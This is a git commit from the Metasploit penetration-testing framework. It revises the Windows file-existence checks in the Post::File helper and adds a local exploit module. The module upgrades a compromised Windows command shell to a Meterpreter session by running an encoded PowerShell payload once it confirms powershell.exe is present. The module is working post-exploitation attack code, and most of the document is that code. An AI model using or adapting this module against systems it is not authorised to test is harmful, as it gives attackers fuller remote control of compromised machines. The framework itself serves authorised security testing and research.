Initial commit

bug/bundler_fix
Meatballs 2014-02-02 19:04:38 +00:00
parent 856feb82e8
commit 95eb758642
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 67 additions and 12 deletions

View File

@ -41,13 +41,14 @@ module Msf::Post::File
return stat.directory?
else
if session.platform =~ /win/
# XXX
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\*\" ( echo true )")
else
f = session.shell_command_token("test -d '#{path}' && echo true")
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end
@ -72,13 +73,17 @@ module Msf::Post::File
return stat.file?
else
if session.platform =~ /win/
# XXX
f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
if f =~ /true/
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\\\\" ( echo false ) ELSE ( echo true )")
end
else
f = session.shell_command_token("test -f '#{path}' && echo true")
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end
@ -93,13 +98,14 @@ module Msf::Post::File
return !!(stat)
else
if session.platform =~ /win/
# XXX
f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
else
f = session.shell_command_token("test -e '#{path}' && echo true")
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end

View File

@ -0,0 +1,49 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Command Shell Upgrade (Powershell)',
'Description' => %q{
This module executes Powershell to upgrade a Windows Shell session
to a full Meterpreter session.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'shell' ],
'Targets' => [ [ 'Universal', {} ] ],
'DefaultTarget' => 0
))
end
def exploit
psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
if file? "%WINDIR%\\System32#{psh_path}"
print_status("Executing powershell command line...")
cmd_exec(cmd_psh_payload(payload.encoded))
else
fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
end
end
end